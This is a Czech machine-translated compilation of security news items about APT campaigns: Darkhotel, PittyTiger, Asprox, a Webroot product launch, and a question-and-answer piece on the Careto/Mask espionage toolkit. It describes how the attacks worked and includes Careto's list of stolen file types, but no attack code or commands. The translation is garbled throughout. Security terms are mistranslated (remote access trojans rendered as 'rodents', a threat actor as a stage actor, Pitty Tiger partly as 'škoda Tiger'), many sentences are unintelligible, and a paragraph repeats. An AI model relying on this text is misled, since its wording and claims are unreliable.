O 90 procent infekcí Zdá se, že se nachází v Japonsku, na Tchaj-wanu, v Číně, Rusku a Jižní Koreji, částečně proto, že ze skupiny bezohledné šíření malware. Celkově od roku 2008, infekce počítat čísla v tisících. Mezi další zajímavé cestování cíle patří vrcholových manažerů z USA a Asie podnikání a investice v asijsko-tichomořské oblasti. Kombinace Kaspersky Security Network (KSN) detekce a velení a řízení datových služeb zaznamenaly infekce v USA, Spojených arabských emirátech, Singapuru, Kazachstánu, Jižní Koreji, na Filipínách, v Hongkongu, Indie, Indonésie, Německo, Irsko, Mexiko, Belgie, Srbsko, Libanon, Pákistán, Řecko, Itálie a další. Distribuce oběť geolocation Herec má dlouhý ocas a více významné cíle a oběti často cestovat po celém mnoha z těchto zemí. Takže změny oběť geolokační, zatímco oni cestují často.

Když výzkumníci Kaspersky Lab navštívil Darkhotel incidentů destinace s honeypot strojů neměli přitahovat Darkhotel útoky, což naznačuje, APT Působí selektivně .. Další práce prokázaly, jak opatrní tyto útočníci byli skrýt svou aktivitu - jakmile cíl byl skutečně napaden, ale odstraněna své nástroje z hotelové sítě představovat bod, zachovat skrytou stav.

Darkhotel aktivity a objekty unikly v kousky za posledních pár let, ale jsme identifikovali Darkhotel nástroje, se datuje do roku 2007. Vzhledem k jejich dostatečného množství zdrojů, pokročilé využití rozvojové úsilí a velkou, dynamickou infrastrukturu, očekáváme více Darkhotel aktivitu v nadcházejících letech. Naše zpráva Darkhotel a přílohy ukazatelů a technických detailů shromažďuje a organizuje tento APT aktivity k dnešnímu dni.

PittyTiger APT Skupina prodává své služby firmám
23.7.2014 APT
APT útočníci mysleli, že provoz z Číny se často zdá, financované vládou, ale existují i jiné skupiny, které pracují pro nejvyšší nabídce, která je obvykle společnost, soukromý sektor, hledá informace, které budou Squash svou konkurenci. Jedna taková skupina je Pitty Tiger, tak pojmenovaný podle bezpečnostních výzkumníků na účet nástroj pro vzdálený přístup (RAT), se zdá, přednost a který byl použit výhradně jimi. skupina je myšlenka k byli aktivní od roku 2011 (možná i dříve), a byl cílení řadu soukromé společnosti, které působí v různých odvětvích: obrana, telekomunikační, vládní, energie, a dokonce i vývoj webových aplikací. Podle vědců z Airbus Defence & Space v kybernetické jednotky, většina z těchto firem se sídlem v Evropě. Útoky skupiny často začínají s kopí-phishing e-maily nesoucí malware, nebo cílené zavlažování díra útoků - a to jak zaměřené na pracovní stanice zaměstnanců. Oběti stáhnout zaminované Word nebo Excel dokument, který využívá jeden z několika existujících zranitelností. Je dobré zdůraznit, že všichni z nich již byla oprava, a že skupina má ještě použít zero-day ve svých útocích. vykořisťování umožňuje útočníkům nainstalovat jeden z několika potkanů ​​v jejich arzenálu: výše uvedené PittyTiger , CT RAT (což se zdá být vývoj PittyTiger), MM RAT ("Goldsun") a Paladin RAT (varianta Gh0st RAT). "I když jsme nebyli schopni najít důkazy o útoku, jehož cílem je využívají zranitelná místa na cíle serverech skupiny, jsme byli schopni zaznamenat několik skenování zranitelnosti spuštěna z jednoho C & C serveru přímo do cíle, "vědci sdílené . "Útočníci používali různé zranitelnosti skenery zaměřené na jejich cíle. Zatímco některé cíle mají Po naskenování se "obecných" skenování zranitelnosti nástrojů, jako je HScan nebo Fluxay a přístavních skenerů, jako Nmap, některé další cíle byly testovány na velmi specifické zranitelnosti, jako ZyWALL zranitelnosti nebo produktu Fortinet. " Také, skupina byla vidět využití Heartbleed chyba, aby se admin pověření, které jsou pak použity k pokusu příčně pohybovat v rámci sítě organizace a, nakonec, aby exfiltrate jeho duševní vlastnictví. ale "běží automatizované zranitelnost skenery na celých rozsahů IP adres používaných cílů nebo na několika doménách je velmi hlučný způsob, jak sbírat informace a nalézt serveru slabá místa, "výzkumníci zdůraznil. "Rádi bychom zastávají názor, že tato metoda je moudré, když chcete zůstat nenápadný, a dělá to ze serveru C & C je velmi překvapivé, přinejmenším. Zatímco skupina Pitty Tiger je zkušený v některých aspektech jeho systémem APT kampaně, rozhodně to postrádá nějakou dobu splatnosti tady. " Výzkumníci se podařilo odhalit řadu C & Cs používané skupinou analýzou variantu PittyTiger malware, a podařilo se jim . Přístup tři z nich využívá řízení chybně přístupu několika složek Toto dovolilo jim fandit kolem a na místě řadu malware a nástroje používané skupinou: výše uvedené potkanů ​​e-mailové špionážní nástroje, hesla sklápěče, síťové skenery, skenery zranitelnosti, a tak dále. "Co je vzácné najít je součástí regulátoru těchto nástrojů. Byli jsme dost štěstí, aby si část regulátoru Pitty Tiger a CT RAT, a dokonce i získat jakousi hybridní regulátoru z pro CT RAT, ale také podporuje škoda Tiger. Domníváme se, že CT RAT je nový vývoj Pitty Tiger a že nahradí škoda, Tiger v následujících měsících, "říkají. "Přítomnost čínské verze" Calc.exe ", oficiální kalkulačka dispozici v systému Microsoft Windows , je zajímavá. Nejen, že je jeden indikátor pravděpodobného čínského původu, ale také ukazatelem toho, že tento server byl pravděpodobně použit jako testovací základna, kromě toho, že je funkční a řízení infikovaných strojů od různých cílů. " Výzkumníci také některé teorie o struktura skupiny, a věří, že identifikovali pozici obsluhy bot, malware pozici vývoje, pozice koordinátora a pozici Customer Relationship manager (klikněte na screenshotu pro zvětšení): Použití čínských nástrojů, RAT vyvinuté čínský mluvící vývojáři , vějička Word dokument napsán v čínštině, a IP adres používaných pro hostování z C & C domén (umístěných zejména v Taipei a Hong Kong City), vše bodů do skupiny se sídlem v Číně. Bližší a rozsáhlých technických podrobností o skupině je operace, podívejte se na tento whitepaper .

Asprox Malware Výpůjční Stealth z APT kampaně
19.6.2014 APT
Počítačoví zločinci a pokročilé útočníci jsou volně půjčovat od jednoho jiný je repertoáru k velkému úspěchu.

Poslední příklad se týká spammery vypálit až do e-mailových zpráv půl milionu vyhrazených segmentech kampaně bez spuštění jakékoliv signalizace požáru. Bezpečnostní společnost FireEye řekl, že útočníci našli recept na vyhnout detekci v jednom používaný řadou APT kampaní, v nichž jsou atributy útoku změnila ve vyšší míře, než IDS a další obrana dokáže držet krok.

Kampaně, prováděné Asprox botnet, byl poprvé spatřen koncem loňského roku a na konci května byly stouply výrazně.

"Od té doby, herci hrozeb neustále vylepšil malware změnou jeho napevno řetězce, příkazy vzdáleného přístupu, a šifrovací klíče," řekl FireEye ve zprávě.

V minulosti, APT kampaně prováděné podle národních států pro účely ekonomické špionáže nebo shromažďování informací, začali spoléhat na taktiky používané v komerčních malware kampaní. V květnu 2013 se pokročilé útoky proti nevládním organizacím, technologie společností, vládních agentur byli spatřeni, a rady bylo zjištěno, že organizátoři se buď koupené nebo zapůjčené na komerční malware a šíření nástrojů z rejstříku podzemí.

V Asprox kampaně mají mnohem širší dosah, infikovat obětí v zemích po celém světě v různých průmyslových odvětvích. Poslední iterace spatřen FireEye se také přestěhoval z, včetně odkazů na škodlivé weby a soubory ke stažení malware, na vkládání škodlivého kódu v přílohách předstírá, že je dokument Microsoft Office v souboru. Zip.

Jakmile oběť padá na phishing nebo nevyžádaných e-mailů a otevře infikovanou přílohu, malware je vstříknut do procesu vytvořeného útočníkem. Brzy backdoor kanály jsou otevřeny pro ovládání a řízení serverů a dat je přesunuta mimo strojů v šifrovaném formátu na útočníky.

Brzy backdoor kanály jsou otevřeny pro ovládání a řízení serverů a dat je přesunuta mimo strojů v šifrovaném formátu na útočníky.
Dříve, Asprox kampaně používá témata, která se pohybovala v rozmezí od letenek, aby Spojené státy poštovní služba spamu. Útočníci se přestěhovali z těch témat, jimiž se soud v souvislosti s e-maily. Oběti jsou vidět falešné upozornění na předvolání k soudu, warranty, sluchu data a v přípravném řízení oznámení.

A zdá se, že funguje.

"Viděli jsme asi 6400 unikátních MD5s rozeslány 29. května th . To je zvýšení 16,000 procent unikátních MD5s nad obvyklou škodlivého e-mailové kampaně jsme se pozorované, "řekl FireEye. "Ve srovnání s jinými nedávnými e-mailových kampaní, Asprox používá množství jedinečných vzorků pro svou kampaň."

FireEye také řekl, že kampaň, která odstartovala v květnu trval do června pak se spoléhat na řadu nových velení a řízení IP adres. Malware obsahuje příkazy ke stažení další kód ze stránky třetích stran, aktualizace kódu, úpravy registru a dokonce i příkaz sám odstranit, mezi ostatními.

"Data ukazují, že každá ze škodlivých e-mailových kampaní Asprox botnet změní svůj způsob lákal oběti a C2 domény, stejně jako technické detaily týkající se měsíčních intervalech," řekl FireEye. "A s každou novou zlepšení, je stále obtížnější pro tradiční metody zabezpečení odhalit určité typy malware."

Webroot poskytuje APT ochranu pro podniky
7.3.2014 APT
Webroot oznámila vydání BrightCloud Security Services a BreachLogic Endpoint Agent, dvěma bezpečnostními nabídky cloudových, jejichž cílem je pomoci organizacím řešit prudký růst a rostoucí sofistikovanost on-line hrozeb, zejména cílených útoků jako "spearphishing" a pokročilé přetrvávající hrozby (Apts).
 

Při boji proti cílené útoky, jeden z hlavních otázek, podniky čelí, je neschopnost sladit neobvyklé události v jejich IT prostředí s aktuální, přesné a žalovatelné bezpečnostní inteligenci, takže je obtížné určit, zda a kde existuje hrozba. Vzhledem k tomu, malware je obvykle součástí těchto pokročilých útoků, to je také důležité, aby podniky pochopit chování aplikací běžících na svých koncových bodů, a pověst souborů, které vstupují do životního prostředí. BrightCloud Bezpečnostní služby předefinovat on-line hrozbách. Sada cloud-based služeb, poháněný vlastním učení pro analýzu ohrožení platformu, která neustále skenuje na internetu, je navržen tak, aby podnikům a technologické partnery OEM posílit jejich bezpečnostní technologii s přesným a žalovatelné hrozeb inteligence. Vylepšená sada obsahuje nový soubor Reputation Service a obohacené kontextové databázi, která koreluje dříve různorodých zabezpečení datových bodů. Tradiční, reaktivní, seznam založené zabezpečení, který pracuje tím, že uznává známých hrozeb je neschopný zastavit moderní malware, který je účel-postavený k útoku jediný cíl. BrightCloud Bezpečnostní služby používat novou inteligenci trojrozměrný ohrožení přístup k identifikaci a zastavit tyto sofistikované hrozby. Tento přístup zahrnuje:
 

Šířka služeb k pokrytí všech kritických zdrojů ohrožení - internet, souborů a mobilní
Cloud-based velká dat architektura v reálném čase hrozby inteligence
Větší hloubka analýzy korelace různorodá data.
Brightcloud Bezpečnostní služby zahrnují Web Reputation, webové Klasifikace, IP pověst, reputaci souborů v reálném čase, Anti-Phishing, Mobile App Reputation, Mobile Security SDK, a SecureWeb prohlížeče SDK. Jsou dodávány prostřednictvím OEM partnerů webroot - včetně mnoha předních poskytovatelů síťové bezpečnosti - pomocí jediného rozhraní API, které jim umožní chránit své zákazníky v okamžiku pravdy, kdy pokročilé kybernetické útoky se objeví uvnitř i vně svých sítí. Všechny tyto služby využívají Naprostá bezpečnost inteligence tzv. cloud-based Webroot Intelligence Network, který neustále zachycuje, analýzy, třídí a publikuje zpravodajství na URL adresy, IP adresy, mobilní aplikace a soubory, a analyzuje nejen chování, ale také koreluje vztahy renomovaným a nebezpečné webové servery, IP, soubory a mobilní aplikace prostřednictvím proprietárního srovnávací motoru. BreachLogic Endpoint Agent poskytuje stejnou cloud-based analýzy hrozeb v řešení pro zabezpečení koncových bodů příští generace pro klienty, servery a mobilní zařízení. Poskytuje včasnou detekci a blokování pokročilé útoky škodlivého softwaru a umožňuje rychlé vyšetřování a nápravu v případě porušení. Sledováním koncových aplikací, procesů a událostí před Webroot ohrožení inteligence, to uznává a zastaví se nikdy předtím neviděl hrozby, které mohou projít nekontrolovaná stávající sítě a bezpečnostních technologií koncového bodu. Navrženo integrovat do stávajícího IT prostředí, BreachLogic Endpoint Agent doplňuje síť bezpečnostní technologie a antiviry v koncových bodech, poskytuje další vrstvu ochrany proti útokům, které infiltrují nebo obejít hranice sítě. kontinuální monitoring The BreachLogic Endpoint agenta poskytuje přehled o koncových aplikací, událostí a procesů, a vztahuje se real-time chování a kontextovou analýzu z Webroot Intelligence Network identifikovat stávající narušení a zabránit budoucím útokům. Bezpečnostní týmy mohou snadno spravovat koncových upozornění s webovým Webroot konzole nebo integrovat koncových dat webroot do svého stávajícího managementu životního prostředí. BreachLogic Endpoint Agent také poskytuje podrobné údaje o soudní pomoci bezpečnostní týmy vyšetřovat zdroj a rozsah porušení identifikovat slabá místa a zabránit budoucí infiltraci.

V Careto / Mask APT: Často kladené otázky
10.2.2014 APT

Co přesně je Careto / "The Mask"?
Maska je moderní hrozba herec, který byl zapojen do cyber-špionážních operací nejméně od roku 2007.

Co dělá maska ​​zvláštní, je složitost sady nástrojů používaných útočníky. To zahrnuje velmi sofistikovaný kus malware, rootkit, je bootkit, Mac OS X a Linux verze a případně i verze pro Android a iPad / iPhone (iOS).

Maska také používá vlastní útok proti starší produkty společnosti Kaspersky Lab, aby bylo možné skrýt v systému. To staví ji nad Duqu z hlediska propracovanosti, aby masku jeden z nejmodernějších hrozeb v současné době. Tento a několik dalších faktorů, aby nám věří, že toto by mohlo být státem sponzorované provoz.

Proč to volat maska?
Název "Mask" pochází ze španělského slangu slovo "Careto" ("Mask" nebo "Ugly Face"), které autoři obsažené v některých malware modulů.

=

Kdo jsou oběti? / Co můžete říci o cílech útoků?
Mezi hlavní cíle Careto spadají do následujících kategorií:

Vládní instituce
Diplomatické úřady a velvyslanectví
Energie, ropy a zemního plynu společnosti
Výzkumné instituce
Private equity firmy
Aktivisté
Víme, celkový počet obětí?
I když přesný počet obětí není znám, jsme pozorovali obětí na více než 1000 IP adres v 31 zemích. Infekce byly pozorovány v: Alžírsko, Argentina, Belgie, Bolívie, Brazílie, Čína, Kolumbie, Kostarika, Kuba, Egypt, Francie, Německo, Gibraltar, Guatemala, Íránu, Iráku, Libye, Malajsie, Mexiko, Maroko, Norsko, Pákistán , Polsko, Jižní Afrika, Španělsko, Švýcarsko, Tunisko, Turecko, Velká Británie, Spojené státy a Venezuela.

Na identifikační algoritmus jsme vyvinuli na základě, jsme napočítali více než 380 unikátních oběti mezi více než 1000 + IP.
 

Nicméně, vzhledem informace oběť byla shromážděna pouze pro některé rozkazech a kontrolních serverů a sinkholed hostitelů, může celkový počet postižených zemí a jedinečné obětí bude mnohem vyšší.

Co Careto dělat? Co se stane poté, co je cílový počítač je nakažený?
Pro oběti, infekce Careto je katastrofální. Malware zachytí všechny komunikační kanály a shromažďuje nejdůležitější informace z infikovaného systému. Detekce je velmi obtížné, protože stealth schopností rootkit. Kromě vestavěných funkcí, mohou provozovatelé Careto nahrát další moduly, které lze provést jakékoliv nebezpečný úkol. Vzhledem k povaze známých obětí, dopad je potenciálně velmi vysoká.

Jak se Careto infikovat počítače?
Maska kampaně jsme zjistili, spoléhá na e-maily, kopí-phishing s odkazy na nebezpečné webové stránky. Infikovaná stránka obsahuje řadu činů, jejichž cílem je infikovat návštěvníka, v závislosti na jeho konfiguraci systému. Po úspěšném infekce, infikovaná stránka přesměruje uživatele na benigní webové stránky odkazované v e-mailu, který může být film, YouTube nebo zpravodajský portál.

Je důležité si uvědomit, využívat webové stránky nejsou automaticky nakazit návštěvníky, místo toho, útočníci hostit využije při určitých složek na webových stránkách, které nejsou přímo odkazuje nikde, s výjimkou škodlivých e-mailů. Někdy, útočníci použít sub-domén na zneužití webových stránkách, aby se jim zdají být legitimní. Tyto sub-domény simulovat dílčí úseky hlavních novin ve Španělsku plus některé mezinárodní ty jako Guardian a Washington Post.

Jsou útočníci využívají všechny zero-day zranitelnost?
Zatím jsme zaznamenali útoky pomocí více vektorů. Patří mezi ně alespoň jedna aplikace Adobe Flash Player využití (CVE-2012-0773). Využití byla navržena pro Flash Player verze před 10.3 a 11.2.

CVE-2012-0773 byl původně objeven VUPEN a má zajímavý příběh. Jednalo se o první využití rozbít pískoviště Chrome a byl použit vyhrát soutěž CanSecWest Pwn2Own v roce 2012. Využít způsobil trochu kontroverzní, protože tým VUPEN odmítl prozradit, jak unikl pískoviště, prohlašovat, že oni byli plánuje prodat využít pro své zákazníky. Je možné, že herec Careto hrozba koupili tuto chybu z VUPEN. (Viz příběh o Ryan Naraine )

Jiné vektory používané patří sociální inženýrství, žádá uživatele, aby si stáhnout a spustit soubor JavaUpdate.jar nebo nainstalovat Chrome prohlížeče plugin. Máme podezření, že ostatní exploity existují také, ale my útočiště-t byl schopen je získat z útoku serveru.

Je to pouze pro systém Windows hrozba? Které verze systému Windows jsou určeny? Existují Mac OS X nebo Linux varianty?
Zatím jsme pozorovali trojské koně pro Microsoft Windows a Mac OS X. Některé využívat serverové cesty obsahuje moduly, které se zdají být navrženy tak, aby infikovat počítače Linux, ale dosud se nachází na Linux backdoor. Navíc, některé z C & C artefaktů (záznamy) naznačují, že také mohou existovat zadní vrátka pro Android a Apple iOS.

Viděli jste žádný důkaz o mobilní komponenty - iOS, Android nebo BlackBerry?
Máme podezření, iOS backdoor existuje, ale nebyli jsme schopni najít to ještě. Podezření je založeno na protokolu ladění z jednoho ze serverů C & C, pokud je zjištěno oběť v Argentině a přihlášeni jako uživatel s agenta na "Mozilla/5.0 (iPad; CPU OS 6_1_3 jako Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Mobile/10B329 ". Zdá se, že naznačují, že je iPad, i když bez vzorku, je těžké být jisti.

Kromě toho jsme také podezření na existenci Android implantátu. Tento je založen na jedinečném identifikátoru verze zaslané C & C, což je "AND1.0.0.0". Komunikace s tímto jedinečným identifikátorem byly pozorovány přes 3G spojení, což naznačuje možnou mobilní zařízení.

Jak se liší od jakéhokoli jiného APT útoku?
Co dělá maska ​​zvláštní, je složitost sady nástrojů používaných útočníky. To zahrnuje velmi sofistikovaný malware, rootkit, je bootkit, Mac a Linux verze a případně i verze pro Android a iPad / iPhone (Apple iOS).

Také maska ​​používá vlastní útok starších produktů Kaspersky aby skryl v systému. To staví ji nad Duqu z hlediska propracovanosti, aby masku jeden z nejmodernějších apts v současné době. Tento a několik dalších faktorů, aby nám věří, že toto by mohlo být státem sponzorované provoz.

Jak jste se dozvěděl o této hrozby? Kdo to hlásil?
Původně jsme si uvědomili Careto, když jsme pozorovali pokusy o zneužití zranitelnosti v našich produktech, aby se malware? Neviditelný? v systému.

Samozřejmě, že to zvedl náš zájem a náš výzkumný tým se rozhodl dále zkoumat. Jinými slovy, útočníci přitahuje naši pozornost tím, že se snaží využít produkty společnosti Kaspersky Lab.

Ačkoliv zranitelnosti v produktech byla objevena a pevná před pěti lety, je zde stále možnost, že existují uživatelé, kteří tam útočiště-t aktualizované produkt. V takových případech využívat může být stále aktivní, i když to nebude nám brání odstranění malware a čištění systému.

Existují rozmanité varianty Careto? Existují velké rozdíly ve variantách?
Careto je vysoce modulární systém, podporuje zásuvné moduly a konfiguračních souborů, které umožňují, aby provést velké množství funkcí.

Varianty Careto mají různé kompilace časová razítka sahající až do roku 2007. Většina modulů byly vytvořeny v roce 2012.

Je příkaz-a-řídicí server používaný Careto stále aktivní? Už jste byli schopni závrtu některý z C & Cs?
V současné době, všechny známé Careto C & C servery offline. Útočníci začali brát je v režimu offline v lednu 2014. Byli jsme také schopni závrtu několik C & C servery, které nám umožnily shromáždit statistické údaje o provozu.

Co přesně je ukraden z cílových strojů?
Malware shromažďuje velký seznam dokumentů z infikovaného systému, včetně šifrovacích klíčů, konfigurace VPN, SSH klíčů a RDP souborů. Existuje také několik neznámých rozšíření monitorováno, že jsme nebyli schopni identifikovat, a může souviset s vlastní vojenské / šifrovacích nástrojů na vládní úrovni.

Zde je úplný seznam nasbíraných souborů z konfigurací jsme analyzovaných:

*.AKF,*.ASC,*.AXX,*.CFD,*.CFE,*.CRT,*.DOC,*.DOCX,*.EML,*.ENC,*.GMG,*.GPG,*.HSE,*.KEY,
*.M15,*.M2F,*.M2O,*.M2R,*.MLS,*.OCFS,*.OCU,*.ODS,*.ODT,*.OVPN,*.P7C,*.P7M,*.P7Z,*.PAB,*.PDF,
*.PGP,*.PKR,*.PPK,*.PSW,*.PXL,*.RDP,*.RTF,*.SDC,*.SDW,*.SKR,*.SSH,*.SXC,*.SXW,*.VSD,
*.WAB,*.WPD,*.WPS,*.WRD,*.XLS,*.XLSX

Je to státem podporovaný útok?
Maska využívá vlastní útok proti starší produkty společnosti Kaspersky Lab, aby bylo možné skrýt v systému. Kromě toho, že obsahuje rootkit, je bootkit, verze Linux / Mac a možná i verze pro Apple iOS. To staví ji nad Duqu z hlediska propracovanosti, aby masku jeden z nejmodernějších apts v současné době.

Také jsme pozorovali velmi vysoký stupeň profesionality v provozních postupů skupiny v pozadí tohoto útoku, včetně sledování jejich infrastruktury, odstavení z provozu, aby se zabránilo zvědavýma očima pomocí přístupových pravidel, pomocí stírání namísto vymazání pro soubory žurnálu, atd. Tato úroveň provozní bezpečnosti není normální cybercriminal skupiny.

Tento a několik dalších faktorů, aby nám věří, že toto by mohlo být státem sponzorované kampaň.

Kdo je za to zodpovědný?
Uveďte je obtížný úkol. Na internetu, je velmi obtížné, aby se solidní připsání vzhledem k nestálé povaze způsobu, jakým byla postavena.

Některé stopy, jako například používání španělského jazyka jsou slabé, protože se mluví v mnoha zemích, včetně Latinské Ameriky, Mexika a Spojených státech (např. v Miami, kde existuje silná španělsky mluvící komunita).

Měli bychom také mít na paměti možnost pod falešnou vlajkou útoků před provedením jakékoli solidní předpoklad o totožnosti toho, kdo je odpovědný, aniž by velmi solidní důkaz.

Jak dlouho se útočníci byli aktivní?
Některé vzorky Careto byly sestaveny jako daleká záda jak 2007. Kampaň byla aktivní až do ledna 2014, ale v průběhu našeho šetření byly servery C & C vypnout.

To je nejméně pět let. Nemůžeme vyloučit možnost, že útočníci vzkřísit kampaň v určitém okamžiku v budoucnosti.

Věděli, že útočníci používají nějaké zajímavé / pokročilé technologie?
Backdoor Windows je velmi sofistikovaný, a útočníci používají řadu technik, aby se snažit, aby útok stealthier. Patří mezi ně injekci do systémových knihoven a pokouší se využít starší produkty společnosti Kaspersky Lab, aby se zabránilo odhalení.

Kromě toho, že využije pokrývají všechny potenciální cílové systémy, včetně Mac OS X a Linux. Také komunikace mezi různými využívají shell kódu modulů se provádí prostřednictvím cookies, což je docela neobvyklé techniky.

Má Kaspersky Lab detekovat všechny varianty tohoto malware?
Ano. Naše produkty detekovat a odstranit všechny známé verze malwaru používané útočníky. Jména detekce:

Trojan.Win32/Win64.Careto. *
Trojan.OSX.Careto
Existují Indikátory kompromisu (IOCs) na pomoc obětem identifikovat vniknutí?
Ano, MOV informace byly obsaženy v našem podrobném technickém výzkumu papíru.

Zde můžete přečíst naši plnou zprávu.